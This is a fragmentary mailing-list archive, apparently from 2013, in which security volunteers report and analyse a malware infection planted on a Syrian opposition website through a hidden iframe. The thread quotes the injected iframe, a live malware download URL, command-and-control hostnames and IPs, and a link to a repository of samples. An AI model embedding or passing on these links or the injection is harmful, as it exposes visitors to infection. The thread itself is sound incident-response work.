-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Dear List,
Here is more details with credit to: Team Cymru:
http://www.team-cymru.org/
> C&C nodes for this version:
>
> melaniibaby.no-ip.biz 173.0.10.52 ghostsx.8866.org
> 192.168.11.1 (so not likely to connect) awrasx10.no-ip.biz
> 95.170.198.
Hello,
I wrote a first summary on the case, I will try to keep it up to date
with new data,
https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/
ALl the best,
KheOps
Le 30/01/2013 00:00, SiNA Rabbani a écrit :
>
> Hi!
>
> I sent the m
Many thanks for posting. I'll spread this to my Syrian friends just to
be aware of this.
All the best,
Hadi
On 01/29/2013 11:05 PM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website : http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFr
Hello,
Le 30/01/2013 03:02, SiNA Rabbani a écrit :
> Ok. I infected an old Windoes xp with this malware and it keeps
> sending SYN requests to this hostname: awrasx10.no-ip.biz which
> currently resolved to: 37.236.124.197 and is down for me.
Thank you for your work :) The hostname still resolves
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Ok. I infected an old Windoes xp with this malware and it keeps
sending SYN requests to this hostname: awrasx10.no-ip.biz which
currently resolved to: 37.236.124.197 and is down for me.
- --SiNA
Internet Protocol Version 4, Src: 10.10.10.17 (10.10.1
Hi!
I sent the malware to a couple of friends that have a setup ready. If
you want to try this it might be fun:
http://docs.cuckoosandbox.org/en/latest/
All the best,
SiNA
KheOps:
> Hey,
>
> Le 29/01/2013 23:34, SiNA Rabbani a écrit :
>> This is the malware:
>>> https://www.virustotal.com/fil
Just a heads up the sites been taken down, malware is here:
https://resources.telecomix.ceops.eu/material/malwares/
Also looking at getting access to the server in question for forensics.
-Andrew
On Jan 30, 2013, at 11:34 AM, SiNA Rabbani wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Hey,
Le 29/01/2013 23:34, SiNA Rabbani a écrit :
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
Yes, saw that too.
However, I don't find any precise description of its behaviour. Like,
what it does, if it opens
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
- --SiNA
SiNA
>
Rabbani:
> holly shit:
>
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.ex
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
holly shit:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe";
border="0"
frameborder="0">
:/ if you are running windows don't even go there!!!
Andrew Lewis:
> I can get to this in 6 hours or so, maybe someone is willing to
> ju
I can get to this in 6 hours or so, maybe someone is willing to jump
on this before then?
-Andrew
On Jan 30, 2013, at 11:06 AM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website : http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFrame
Dear Libtech,
We just saw that the website : http://www.syrian-martyrs.com is probably
compromised. Every page of the website contains an iFrame which links to
a .exe file which is detected as a virus by antivirus software:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
The fac
12 matches
Mail list logo